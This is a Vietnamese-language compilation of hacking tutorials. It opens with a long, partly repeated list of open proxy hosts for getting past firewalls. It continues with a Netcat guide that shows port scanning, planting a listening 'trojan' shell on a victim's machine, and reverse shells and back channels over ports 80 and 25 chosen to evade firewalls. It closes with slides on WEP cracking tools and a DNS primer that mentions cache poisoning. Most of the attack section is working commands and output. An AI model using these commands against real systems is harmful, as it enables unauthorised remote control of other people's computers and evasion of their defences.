sthweb1.helanta.sh:8080

194.74.201.10:8080

194.74.201.31:8080

194.79.113.83:8080

195.103.8.10:8080

195.22.176.226:8080

195.59.64.130:8080

mail.voltex.co.za:8080

www.wopl.org:8080

mail.hwe.cl:8080

200.193.46.18:8080

200-204-180-92.dsl.telesp.net.br:8080

200.21.225.82:8080

200.24.214.154:8080

200.31.204.58:8080

200.44.114.22:8080

213.25.170.98:8080

210.90.3.43:8080

acode-u.org:8080

216.120.43.90:8080

xirus.com:8080

sub-166ip130.carats.net:8080

213.187.210.35:8080

silainiai.failanas.lt:8080

zg2.intereuropa.hr:8080

proxy.elekta.lt:8080

5.interpacket.net:8080

217.96.4.195:8080

host77-178.pool21759.interbusiness.it:8080

h00e02938bfa0.ne.client2.attbi.com:8080

ip-84-101-67-210.rev.dyxnet.com:8080

213.16.141.10:8080

216.72.63.198:8080

217.10.214.182:8080

61.129.72.219:8080

host217-34-153-161.in-addr.btopenworld.com:8080

proxy1.drugeleven.com:8080

tgw.actuate.co.jp:8080

proxy.cablenet.net.ar:8080

210.82.34.250:8080

217.153.114.66:8080

61.11.26.142:8080

61.138.130.229:8080

mail.gadormail.com.ar:8080

61.180.73.66:8080

host162-148.pool62110.interbusiness.it:8080

p1030- ipadfx01morioka.iwate.ocn.ne.jp:8080

61.32.11.130:8080

211.138.91.22:8080

211.104.16.96:8080

202.100.72.33:8080

202.104.189.20:8080

200.61.6.50:8080

200.32.75.90:8080

202.105.138.19:8080

202.129.27.8:8080

202.186.101.151:8080

202.187.229.8:8080

202.28.68.18:8080

202.64.21.83:8080

202.99.225.45:8080

www.flab.fr:8080

211.233.21.166:8080

211.233.68.202:8080

211.250.149.132:8080

211.35.145.4:8080

211.35.78.36:8080

211.39.13.3:8080

211-41-184-225.rev.krline.net:8080

211.45.21.165:8080

211.93.108.113:8080

proxy.sca.cnrs.fr:8080

62.176.44.226:8080

ce3-mel.netspace.net.au:8080

202.67.212.2:8080

203.117.67.122:8080

203.148.254.131:8080

211.183.77.60:8080

211.190.27.102:8080

211.20.74.250:8080

211.21.111.227:8080

proxy.nida.ac.th:8080

ipvpn099169.netvigator.com:8080

203.241.151.50:8080

dns2.eagletech.com.au:8000

203.94.243.1:8080

223-mail.internet.ve:8080

209.31.157.33:8080

209.53.200.33:8080

n124h001.academycanada.com:8080

mail.bravocorp.com:8080

206.191.104.66:8080

cfw.candw.lc:8080

courriel.collegesaintsacrement.qc.ca:8080

router.banksandholeyfield.com:8080

210.0.140.34:8080

210.0.199.183:8080

210.0.214.130:8080

namesn.wadakogyo.co.jp:8080

mx.megasoft.co.jp:8088

210.204.118.194:8080

209.31.157.2:8080

210.219.227.52:8080

130.228.101.40:8080

fhm.fhm.fhg.de:8080

166.114.173.3:8080

168.216.25.172:8080

193.188.87.35:8080

193.188.95.146:8080

pandora.teimes.gr:8080

pc1.kronospan.com.cy:8080

sthweb1.helanta.sh:8080

194.74.201.10:8080

194.74.201.31:8080

194.79.113.83:8080

195.103.8.10:8080

sun.s.surfinn.com:8080

195.22.176.226:8080

195.59.64.130:8080

mail.voltex.co.za:8080

n124h001.academycanada.com:8080

www.wopl.org:8080

mail.hwe.cl:8080

200.193.46.18:8080

200-204-180-92.dsl.telesp.net.br:8080

200.21.225.82:8080

200.24.214.154:8080

200.31.204.58:8080

200.32.75.90:8080

200.44.114.22:8080

proxy.cablenet.net.ar:8080

mail.gadormail.com.ar:8080

200.61.6.50:8080

202.100.72.33:8080

202.104.189.20:8080

202.105.138.19:8080

202.129.27.8:8080

202.186.101.151:8080

202.187.229.8:8080

202.28.68.18:8080

202.64.21.83:8080

202.67.212.2:8080

202.99.225.45:8080

ce3-mel.netspace.net.au:8080

203.117.67.122:8080

203.148.254.131:8080

proxy.nida.ac.th:8080

203.179.49.74:8080

ipvpn099169.netvigator.com:8080

203.241.151.50:8080

203.94.243.1:8080

223-mail.internet.ve:8080

mail.bravocorp.com:8080

206.191.104.66:8080

cfw.candw.lc:8080

courriel.collegesaintsacrement.qc.ca:8080

router.banksandholeyfield.com:8080

209.31.157.2:8080

209.31.157.33:8080

209.53.200.33:8080

210.0.140.34:8080

210.0.199.183:8080

210.0.214.130:8080

namesn.wadakogyo.co.jp:8080

210.204.118.194:8080

210.219.227.52:8080

ip-84-101-67-210.rev.dyxnet.com:8080

210.82.34.250:8080

211.104.16.96:8080

211.138.91.22:8080

211.183.77.60:8080

211.190.27.102:8080

211.20.74.250:8080

211.21.111.227:8080

211.233.21.166:8080

211.233.68.202:8080

211.250.149.132:8080

211.35.145.4:8080

211.35.78.36:8080

211.39.13.3:8080

211-41-184-225.rev.krline.net:8080

211.45.21.165:8080

211.93.108.113:8080

webmail.alami.net:8080

212.15.17.210:8080

212.31.116.98:8080

212.80.166.163:8080

213.16.141.10:8080

acode-u.org:8080

213.187.210.35:8080

silainiai.failanas.lt:8080

zg2.intereuropa.hr:8080

proxy.elekta.lt:8080

213.25.170.98:8080

213.25.43.242:8080

216.120.43.90:8080

xirus.com:8080

sub-166ip130.carats.net:8080

host-216-252-226-5.interpacket.net:8080

216.72.63.198:8080

217.10.214.182:8080

217.153.114.66:8080

host217-34-153-161.in-addr.btopenworld.com:8080

host77-178.pool21759.interbusiness.it:8080

217.96.4.195:8080

h00e02938bfa0.ne.client2.attbi.com:8080

61.11.26.142:8080

proxy1.drugeleven.com:8080

tgw.actuate.co.jp:8080

61.129.72.219:8080

61.138.130.229:8080

61.180.73.66:8080

p1030-ipadfx01morioka.iwate.ocn.ne.jp:8080

61.32.11.130:8080

host162-148.pool62110.interbusiness.it:8080

sun.aa.surfinn.com:8080

www.flab.fr:8080

proxy.sca.cnrs.fr:8080

62.176.44.226:8080

adsl-63-192-134-107.dsl.snfc21.pacbell.net:8080

63.193.207.2:8080

adsl-64-164-243-146.dsl.lsan03.pacbell.net:8080

dell.compleat.com:8080

80.196.228.136:8080

AS7000_1B.sfn.co.jp:8080

210.145.17.38:8080

nt1public.mcnet.ch:8080

mail.1ainfo.ch:8080

202.39.225.81:8080

203.166.96.231:8080

211.20.195.43:8080

194.78.66.68:8080

210.90.3.43:8080

proxy.gsf.de:8000

193.15.252.80:8000

193.217.66.7:8000

193.29.2.13:8000

64-132-153-94.gen.twtelecom.net:8000

216.101.117.161:8000 www2.soas.ac.uk:8000

194.192.99.2:8000

211.15.62.123:8000

mail.theweb.co.uk:8000

griffin-mc.com:8000

195.162.160.5:8000

195.178.164.205:8000

195.97.138.212:8000

mail.millennium.co.za:8000

lvsweb.lasvegasstock.com:8000

host071052.arnet.net.ar:8000

commerce.visionsinc.com:8000

www.artcars.com:8000

www.thestudy.qc.ca:8000

poste242.multi-media.ca:8000

193.15.176.34:8000

ftp.orange.uk.com:8000

210.254.8.52:8000

207.61.38.67:8000

209.7.88.130:8000

h-209-91-87-163.gen.cadvision.com:8000

www.hida11pm-unet.ocn.ne.jp:8000

209.23.81.59:8000

mas-hamilton.com:80

209.47.38.116:8000

211.104.16.96:8000

www.dj8000.com:8000

212.12.157.130:8000

212.141.41.42:8000

host182-44.pool21758.interbusiness.it:8000

mail.globallink.de:8000

........

Nếu vẫn chưa leo được qua tường thì tạm dừng tay ! tắt máy lên giường đi ngủ dưỡng sức, tỉnh dậy leo tiếp...

bằng 2 link sau:

http://k.domaindlx.com/clairsang/tuonglua.2ya.com/default.htm

http://k.domaindlx.com/clairsang/proxy4free.com/default.htm

Hướng dẫn sử dụng Netcat

1. Giới thiệu

Netcat là một công cụ không thể thiếu được nếu bạn muốn hack một website nào đó. Vì vậy bạn cần biết một chút về Netcat.

2. Biên dịch

Đối với bản Netcat cho Linux, bạn phải biên dịch nó trước khi sử dụng.

- hiệu chỉnh file netcat.c bằng vi: vi netcat.c

+ tìm dòng res_init(); trong main() và thêm vào trước 2 dấu "/": // res_init();

+ thêm 2 dòng sau vào phần #define (nằm ở đầu file):

#define GAPING_SECURITY_HOLE

#define TELNET

- biên dịch: make linux

- chạy thử: ./nc -h

- nếu bạn muốn chạy Netcat bằng nc thay cho ./nc, bạn chỉ cần hiệu chỉnh lại biến môi trường PATH trong file ~/.bashrc, thêm vào ":."

PATH=/sbin:/usr/sbin:...:.

Bản Netcat cho Win không cần phải compile vì đã có sẵn file nhị phân nc.exe. Chỉ vậy giải nén và chạy là xong.

3. Các tùy chọn của Netcat

Netcat chạy ở chế độ dòng lệnh. Bạn chạy nc -h để biết các tham số:

C:\>nc -h

connect to somewhere: nc [-options] hostname port[s] [ports] ...

listen for inbound: nc -l -p port [options] [hostname] [port]

options:

-d detach from console, stealth mode

-e prog inbound program to exec [dangerous!!]

-g gateway source-routing hop point[s], up to 8

-G num source-routing pointer: 4, 8, 12, ...

-h this cruft

-i secs delay interval for lines sent, ports scanned

-l listen mode, for inbound connects

-L listen harder, re-listen on socket close

-n numeric-only IP addresses, no DNS

-o file hex dump of traffic

-p port local port number

-r randomize local and remote ports

-s addr local source address

-t answer TELNET negotiation

-u UDP mode

-v verbose [use twice to be more verbose]

-w secs timeout for connects and final net reads

-z zero-I/O mode [used for scanning]

port numbers can be individual or ranges: m-n [inclusive]

* Cú pháp:

- chế độ kết nối : nc [-tùy_chọn] tên_máy cổng1[-cổng2]

- chế độ lắng nghe: nc -l -p cổng [-tùy_chọn] [tên_máy] [cổng]

* Một số tùy chọn:

-d tách Netcat khỏi cửa sổ lệnh hay là console, Netcat sẽ chạy ở chế độ steath(không hiển thị trên thanh Taskbar)

-e prog thi hành chương trình prog, thường dùng trong chế độ lắng nghe

-h gọi hướng dẫn

-i secs trì hoãn secs mili giây trước khi gởi một dòng dữ liệu đi

-l đặt Netcat vào chế độ lắng nghe để chờ các kết nối đến

-L buộc Netcat "cố" lắng nghe. Nó sẽ lắng nghe trở lại sau mỗi khi ngắt một kết nối.

-n chỉ dùng địa chỉ IP ở dạng số, chẳng hạn như 192.168.16.7, Netcat sẽ không thẩm vấn DNS

-o file ghi nhật kí vào file

-p port chỉ định cổng port

-r yêu cầu Netcat chọn cổng ngẫu nhiên(random)

-s addr giả mạo địa chỉ IP nguồn là addr

-t không gởi các thông tin phụ đi trong một phiên telnet. Khi bạn telnet đến một telnet daemon(telnetd), telnetd thường yêu cầu trình telnet client của bạn gởi đến các thông tin phụ như biến môi trường TERM, USER. Nếu bạn sử dụng netcat với tùy chọn -t để telnet, netcat sẽ không gởi các thông tin này đến telnetd.

-u dùng UDP(mặc định netcat dùng TCP)

-v hiển thị chi tiết các thông tin về kết nối hiện tại. -vv sẽ hiển thị thông tin chi tiết hơn nữa.

-w secs đặt thời gian timeout cho mỗi kết nối là secs mili giây

-z chế độ zero I/O, thường được sử dụng khi scan port

Netcat hổ trợ phạm vi cho số hiệu cổng. Cú pháp là cổng1-cổng2. Ví dụ: 1-8080 nghĩa là 1,2,3,..,8080

4. Các ví dụ:

4.1 Chộp banner của web server

Ví dụ: nc đến 172.16.84.2, cổng 80

C:\>nc 172.16.84.2 80

HEAD / HTTP/1.0 (tại đây bạn gõ Enter 2 lần)

HTTP/1.1 200 OK

Date: Sat, 05 Feb 2000 20:51:37 GMT

Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2

OpenSSL/0.9.6 PHP/4.0.4pl1

Connection: close

Content-Type: text/html

Để biết thông tin chi tiết về kết nối, bạn có thể dùng -v(-vv sẽ cho biết các thông tin chi tiết hơn nữa)

C:\>nc -vv 172.16.84.1 80

172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA

(UNKNOWN) [172.16.84.1] 80 (?) open

HEAD / HTTP/1.0

HTTP/1.1 200 OK

Date: Fri, 04 Feb 2000 14:46:43 GMT

Server: Apache/1.3.20 (Win32)

Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT

ETag: "0-cec-3899eaea"

Accept-Ranges: bytes

Content-Length: 3308

Connection: close

Content-Type: text/html

sent 17, rcvd 245: NOTSOCK

Nếu muốn ghi nhật kí, hãy dùng -o <tên_file>. Ví dụ:

nc -vv -o nhat_ki.log 172.16.84.2 80

- xem file nhat_ki.log

< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.

< 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F

< 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54

< 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT..Server: Ap

< 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win

< 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi

< 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb

< 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM

< 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: "0-cec-

< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea"..Accep

< 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes.

< 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:

< 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308..Connectio

< 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten

< 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm

< 000000f0 6c 0d 0a 0d 0a # l....

dấu < nghĩa là server gởi đến netcat

dấu > nghĩa là netcat gởi đến server

4.2 Quét cổng

- chạy netcat với tùy chọn -z. Để quét cổng nhanh hơn, hãy dùng -n vì netcat sẽ không cần thấm vấn DNS. Ví dụ để scan các cổng TCP(1->500) của host 172.16.106.1

[dt@vicki /]# nc -nvv -z 172.16.106.1 1-500

(UNKNOWN) [172.16.106.1] 443 (?) open

(UNKNOWN) [172.16.106.1] 139 (?) open

(UNKNOWN) [172.16.106.1] 111 (?) open

(UNKNOWN) [172.16.106.1] 80 (?) open

(UNKNOWN) [172.16.106.1] 23 (?) open

- nếu bạn cần scan các cổng UDP, dùng -u

[dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500

(UNKNOWN) [172.16.106.1] 1025 (?) open

(UNKNOWN) [172.16.106.1] 1024 (?) open

(UNKNOWN) [172.16.106.1] 138 (?) open

(UNKNOWN) [172.16.106.1] 137 (?) open

(UNKNOWN) [172.16.106.1] 123 (?) open

(UNKNOWN) [172.16.106.1] 111 (?) open

4.3 Biến Netcat thành một trojan

- trên máy tính của nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn -l(listen) và -p port để xác định số hiệu cổng cần lắng nghe, -e <tên_chương_trình_cần_chạy> để yêu cầu netcat thi hành 1 chương trình khi có 1 kết nối đến, thường là shell lệnh cmd.exe(đối với NT) hoặc /bin/sh(đối với Unix). Ví dụ:

E:\>nc -nvv -l -p 8080 -e cmd.exe

listening on [any] 8080 ...

connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159

sent 0, rcvd 0: unknown socket error

- trên máy tính dùng để tấn công, bạn chỉ việc dùng netcat nối đến máy nạn nhân trên cổng đã định, chẳng hạn như 8080

C:\>nc -nvv 172.16.84.2 8080

(UNKNOWN) [172.16.84.2] 8080 (?) open

Microsoft Windows 2000 [Version 5.00.2195]

(C) Copyright 1985-1999 Microsoft Corp.

E:\>cd test

cd test

E:\test>dir /w

dir /w

Volume in drive E has no label.

Volume Serial Number is B465-452F

Directory of E:\test

[.] [..] head.log NETUSERS.EXE NetView.exe

ntcrash.zip password.txt pwdump.exe

6 File(s) 262,499 bytes

2 Dir(s) 191,488,000 bytes free

C:\test>exit

exit

sent 20, rcvd 450: NOTSOCK

Như bạn thấy, chúng ta đã có thể làm gì mà chẳng được với máy của nạn nhân qua shell lệnh này?! Tuy nhiên, sau kết nối trên, netcat trên máy nạn nhân cũng đóng luôn. Để yêu cầu netcat lắng nghe trở lại sau mỗi kết nối, bạn dùng -L thay cho -l. Lưu ý: -L chỉ có thể áp dụng cho bản Netcat for Windows, không áp dụng cho bản chạy trên Linux.

E:\>nc -nvv -L -p 8080 -e cmd.exe

listening on [any] 8080 ...

- Riêng đối với Netcat cho Win, bạn có thể lắng nghe ngay trên cổng đang lắng nghe. Chỉ cần chỉ định địa chỉ nguồn là -s <địa_chỉ_ip_của_máy_này>. Ví dụ:

netstat -a

...

TCP nan_nhan:domain nan_nhan:0 LISTENING <- cổng 53 đang lắng nghe

...

E:\>nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 -> lắng nghe ngay trên cổng 53

listening on [172.16.84.1] 53 ...

connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163

- Trên Windows NT, để đặt Netcat ở chế độ lắng nghe, không cần phải có quyền Administrator, chỉ cần login vào với 1 username bình thường khởi động Netcat là xong.

- Chú ý: bạn không thể chạy netcat với ... -u -e cmd.exe... hoặc ...-u -e /bin/sh... vì netcat sẽ không làm việc đúng. Nếu bạn muốn có một UDP shell trên Unix, hãy dùng udpshell thay cho netcat.

5. Kĩ thuật tiên tiến

5.1 Telnet nghịch chuuyển

- dùng telnet để nối cửa số netcat đang lắng nghe, kế đó đưa lệnh từ cửa sổ này vào luồng telnet nghịch chuyển, và gởi kết quả vào cửa sổ kia. Ví dụ:

- trên máy dùng để tấn công(172.16.84.1), mở 2 cửa sổ netcat lần lượt lắng nghe trên cổng 80 và 25:

+ cửa sổ Netcat (1)

C:\>nc -nvv -l -p 80

listennng on [any] 80 ...

connect to [172.16.84.1] from <UNKNOWN> [172.16.84.2] 1055

pwd

ls -la

_

+ cửa sổ Netcat (2)

C:\>nc -nvv -l -p 25

listening on [any] 25 ...

connect to [172.16.84.1] from (UNKNOWN) [172.16.84.2] 1056

total 171

drwxr-xr-x 17 root root 4096 Feb 5 16:15 .

drwxr-xr-x 17 root root 4096 Feb 5 16:15 ..

drwxr-xr-x 2 root root 4096 Feb 5 08:55 b ( ²?n

drwxr-xr-x 3 root root 4096 Feb 5 14:19 boot

drwxr-xr-x 13 root root 106496 Feb 5 14:18 dev

drwxr-xr-x 37 root root 4096 Feb 5 14:23 et = ²?

drwxr-xr-x 6 root root 4096 Feb 5 08:58 home

drwxr-xr-x 6 root root 4096 Feb 5 08:50 l ( ²?b

drwxr-xr-x 2 root root 7168 De = ²? 31 1969 mnt

drwxr-xr-x 4 root root 4096 Feb 5 16:18 n = ²?

drwxr-xr-x 2 root root 4096 Aug 23 12:03 opt

dr-xr-xr-x 61 root root 0 Feb 5 09:18 pro = ²?

drwx------ 12 root root 4096 Feb 5 16:24 root

drwxr-xr-x 2 root root 4096 Feb 5 08:55 sb ( ²?n

drwxrwxrwt 9 root root 4096 Feb 5 16:25 tmp

drwxr-xr-x 13 root root 4096 Feb 5 08:42 usr

drwxr-xr-x 18 root root 4096 Feb 5 08:52 var

- trên máy tính nạn nhân(172.16.84.2), telnet nghịch chuyển đến máy dùng để tấn công(172.16.84.1), dùng /bin/sh để kết xuất:

[root@nan_nhan /]# telnet 172.16.84.1 80 | /bin/sh | telnet 172.16.84.1 25

/bin/sh: Trying: command not found

/bin/sh: Connected: command not found

/bin/sh: Escape: command not found

Trying 172.16.84.1...

Connected to 172.16.84.1.

Escape character is '^]'.

_

Telnet trên máy nạn nhân sẽ chuyển tất cả những gì mà chúng ta gõ vào trong cửa sổ Netcat (1) - cổng 80 kết xuất sang cho /bin/sh thi hành. Kết quả của /bin/sh được kết xuất trở lại cho máy tính dùng để tấn công trên cửa sổ Netcat (2) - cổng 25. Nhiệm vụ của bạn là chỉ cần gõ lệnh vào cửa sổ Netcat (1) và xem kết quả trong cửa sổ Netcat (2).

Sở dĩ tôi chọn cổng 80 và 25 vì các cổng này thường không bị firewalls hoặc filters lọc.

5.2 Tạo kênh sau

Cũng tương tự như telnet nghịch chuyển.

- trên máy tính dùng để tấn công, bạn đặt Netcat lắng nghe trên cổng 80 vì cổng này sẽ không bị firewall chặn:

C:\>nc -nvv -l -p 80

listennng on [any] 80 ...

- tiếp theo, từ shell lệnh của máy nạn nhân, bạn nối Netcat đến máy dùng để tấn công với tùy chọn -e để đổ shell:

E:\>nc -e cmd.exe 172.16.84.1 80

Một khi máy nạn nhân thi hành chuổi lệnh trên, kênh sau nc sẽ được tạo, "nhét" shell (trong trường hợp này là cmd.exe) trở vào nc. Kể từ đây, chúng ta đã có 1 shell lệnh ảo.

C:\>nc -nvv -l -p 80

listenning pm [any] 80 ...

connect to [172.16.84.1] from [UNKNOWN] [172.16.84.3] 1035

Microsoft Windows 2000 [Version 5.00.2195]

(C) Copyright 1985-1999 Microsoft Corp.

E:\>

5.3 Đổi hướng cổng

Bạn có thể dùng tunnel.pl hoặc fpipe.exe. Hãy xem ví dụ sau:

- chạy nc trên cổng bất kì:

E:\>nc -nvv -L -p 1234 -e cmd.exe

listening on [any] 1234 ...

- chạy tunnel hoặc fpipe để đổi hướng cổng

C:\>perl tunnel.pl --port=53 --tohost=127.0.0.1 --toport=1234

C:\>fpipe -l 53 -r 1234 127.0.0.1

tunnel, fpipe sẽ lắng nghe trên cổng 53, sau đó chuyển tiếp kết nối đến 127.0.0.1:1024, đây là cổng mà netcat đang lắng nghe.

Đổi hướng cổng là một cách để đi vòng qua firewalls.

Mạng không dây và các vấn đề an ninh

Tóm tắt nội dung

• Kỹ thuật mạng không dây WLAN

• Những vấn đề an ninh của mạng không dây

• Một số công cụ hacking mạng không dây

• Các biện pháp bảo vệ và phát hiện thâm nhập

Kỹ thuật mạng không dây WLAN

• Mạng không dây WLAN hiện nay dựa trên nền tảng các tiêu chuẩn IEEE 802.11:

– Hoạt động trên các tấn số 2.4 và 5 Ghz thuộc dải tần số giành cho công nghiệp, khoa học và Y tế (ISM).

– Tốc độ từ 1 Mb/s đến 54 Mb/s

Kỹ thuật mạng không dây WLAN

• IEEE 802.11 quy định các tiêu chuẩn về tín hiệu và giao thức nhằm đảm bảo tính tương thích cho các thiết bị mạng không dây.

• Nhờ IEEE 802.11, sự ứng dụng của WLAN đã có bước phát triển nhảy vọt trong 3 năm gần đây.

Một số ưu điểm của mạng không dây WLAN

• Không phải khoan tường, bấm và đi dây.

• Không phải ngồi tại những vị trí cố định.

• Trong nhiều trường hợp là giải pháp rẻ hơn cho mạng LAN

• Có thể kết nối ở khoảng cách xa hơn so với các thiết bị blue tooth hoặc IR.

• Công suất và tốc độ có thể chấp nhận được…..

Nhược điểm của mạng không dây

• Phức tạp hơn trong việc thiết lập, quản lý và vận hành mạng.

• Thông tin được truyền trên không trung trên tần số dùng chung dẫn đến các vấn đề an ninh và nhiễu.

• Tần số càng cao thì tốc độ càng cao, nhưng đồng thời độ suy giảm cũng càng cao...

Các mô hình WLAN

• Mô hình infrastructure: ABCDEF kết nối thông qua AP

• Extended Service Set (ESS)

• A - - - | - ------- Access Point (AP)------- | - - - D

• B - - - | | - - - E

• C - - - | | - - - F

• Mô hình ad-hoc: ABCD kết nối với nhau trực tiếp

• A - - - C

• | \ / |

• | /\ |

• | / \ |

• B - - - D

Những vấn đề an ninh của mạng không dây

• Nhận thức của người dùng:

– Kỹ thuật mới, hiện đại, ít người am hiểu tường tận.

– Quan điểm chủ quan (quá phức tạp chắc không ai biết)

– Cấu hình mặc định của các thiết bị thường ở chế độ mở hoàn toàn.

• Các lỗ hổng bảo mật:

– WEP (wired equivalent protocol) không an toàn

– MAC filtering không hiệu quả vì MAC có thể bị thay đổi

Lỗ hổng bảo mật WEP

• Wired Equivalent Protcol (WEP) là một bộ phận bảo mật của chuẩn IEEE 802.11.

• WEP sử dụng 64 hoặc 128 bits keys để mã hoá data ở mức link-layer dựa trên thuật toán RC4, trong đó 24 bits được dùng cho Initialization Vector (IV).

Lỗ hổng bảo mật WEP

• Do nhược điểm của việc ứng dụng IV và RC4 trong chuẩn 802.11, khoá WEP có thể bị bẻ gãy trong khoảng thời gian tính bằng phút với một may tính thông thường.

MAC spoofing

• Phần lớn các Access Point đều sử dụng danh sách địa chỉ MAC như là một phương tiện bảo mật.

• Người dùng thông thường tưởng rằng mình đã được bảo vệ khi ứng dụng cơ chế hạn chế địa chỉ MAC.

• Tuy nhiên địa chỉ MAC có thể bị thay đổi chỉ với một câu lệnh

Một số công cụ hacking WLAN

• Netstumbler:

– Là công cụ dùng để thu thập thông tin của các AP

– Chạy trên Windows

– Tính năng GPS plug-in cho phép xác định toạ độ của các AP.

– Thu thập tín hiệu một cách chủ động (cách gửi yêu cầu lên không trung và đợi trả lời) nên có thể bị phát hiện.

– Có thể cung cấp các thông tin về AP như MAC, nhà sản xuất, SSID, biện pháp bảo mật, kênh tần số, vv.

Một số công cụ hacking WLAN

• Airsnort:

– Là công cụ được xây dựng nhằm mục đích chứng minh độ an toàn thấp của WEP.

– Chạy trên Linux.

– Bắt tín hiệu trong không gian một cách thụ động nên không bị phát hiện.

– Khi thu thập đủ số liệu, Airsnort có thể tự động bẻ khoá và hiển thị mật khẩu trên màn hình.

Một số công cụ hacking WLAN

• Kismet:

– Cũng là một công cụ dùng để bẻ khoá WEP

– Chạy trên Linux, openBSD, Cygwin, MacOS X

– Nhiều tính năng hơn Airsnort:

• Phát hiện được các IP block

• Log file tương thích với các công cụ khác như Ethereal, Tcpdump hay Airsnort.

• Phát hiện được cả các SSID ẩn

• Phát hiện được nhà sản xuất AP

Các biện pháp bảo mật cho WLAN

• Thay đổi ngay các giá trị mặc định của thiết bị trước khi đưa vào sử dụng.

• Đặt AP ở vị trí hợp lý sao cho người dùng có được tín hiệu tốt nhất và hạn chế được tín hiệu ra bên ngoài.

Các biện pháp bảo mật cho WLAN

• Tránh sử dụng AP trên cùng kênh với các AP khác.

• Áp dụng tất cả các biện pháp bảo mật của thiết bị mà nhà sản xuất cung cấp.

• Luôn cập nhật các phiên bản firmware mới nhất.

• Dùng Virtual Private Network (VPN)

Tìm Hiểu về Domain :

1. Domain name là gì?

Máy tính có thể làm việc rất tốt với những con số nhưng con người thì không. Khi cần kết nối với một thiết bị trên mạng thì bạn chỉ cần đánh IP của thiết bị đó. Điều này hiển nhiên là rất rắc rối và khó nhớ, vì vậy tên miền (domain) được tạo ra.Giống như file, tên miền cũng có đuôi, chúng có ý nghĩa như sau:

.COM: thương mại, công ty hoặc bất kỳ người nào.

.EDU: giáo dục, thường là các trường đại học hoặc trường học.

.MIL: quân sự.

.GOV: chính phủ.

.ORG: các tổi chức, thường là các tổ chức hoạt động phi thương mại. Tuy nhiên mọi người cũng có thể xó domain này.

.CH,.DE,.VN...: Tuỳ thuộc vào quốc gia đã đăng ký theo tiêu chuẩn thế giới. Bạn có thể tham khảo thêm

tại đây

.

Một vài trang web có thể có 2 phần mở rộng là .COM.VN

Tên miền được đưa ra bởi Internic và bạn phải mua nó. Ví dụ nếu bạn muốn có một web site có tên

http://k.domaindlx.com/clairsang/www.camauonline.com/default.htm

thì bạn phải trả tiền cho Internic để có được site này. Sau đó bạn không cần phải trả tiền cho các domain như tungxeng.tools.com....Khi đánh một tên miền thì sẽ có một server là DNS (Domain Server Name) tìm kiếm trong bảng tham chiếu xem số IP tương ứng là gì. Nếu không tìm được, nó sẽ tìm ở một DSN khác! Cùng một IP, có thể có nhiều tên miền khác nhau và điều này thường xảy ra.

Ví dụ: nếu ISP của bạn là vnn.com và web site của bạn là http:// www.vnn.com/thuongmai thì bạn có trả tiền cho tên miền thuongmai.com và mọi người có thể truy cập vào site của bạn bằng

http://k.domaindlx.com/clairsang/www.www.thuongmai.com/default.htm

và tất nhiên là

http://k.domaindlx.com/clairsang/www.vnn.com/thuongmai

vẫn tồn tại. Dấu " / " chỉ ra thư mục mà lưu trữ trang web trên server.

2. Domain có thể nói lên điều gì:

Khi bạn kết nối với ISP, bạn sẽ có một IP và IP này sẽ có một tên miền.

Ví dụ: ISP của bạn là tungxeng.com thì bạn có thể có tên miền là tools.server1.tungxeng.com và mọi người có thể biết ISP của bạn là ai và quốc tịch của bạn là gì.

3. Đổi tên miền như thế nào:

Có thể đăng ký một tên mới, mua một IP cố định hoặc đổi ISP. Bảng tham chiếu DNS được tạo ra từ yêu cầu của DNS chứa tên miền. Ví dụ nếu bạn sở hữu "tungxeng.com" DNS server sẽ gởi yêu cầu đến DNS server của bạn về "ten.tungxeng.com". Bảng tham chiếu này không thể bị sữa chữa trừ khi bạn có toàn quyền truy cập vào DNS server. Nhưng không có một bảng tham chiếu nào có đầy đủ tất cả các tên miền. Vì vậy khi nó không tìm được tên miền thì nó sẽ gởi yêu cầu đến một DNS khác.

Để tăng tốc độ xử lí, DNS còn có một bộ nhớ cache. Khi có nhiều người cùng yêu cầu một tên miền, thì DNS server sẽ tìm trong cache trước. Nếu bạn gởi thông tin giả đến DNS cache và người khác cùng đến một địa chỉ họ cũng sẽ nhận được thông tin giả mạo đó

( Những tên tôi nêu trên chỉ với tích chất tham khảo , nếu bạn muốn biết rõ hơn bạn hãy vào trang www.google.com mà tìm , bạn sẽ được kết quả cụ thể ) .

Ảnh hưởng của các lỗ hổng bảo mật trên internet

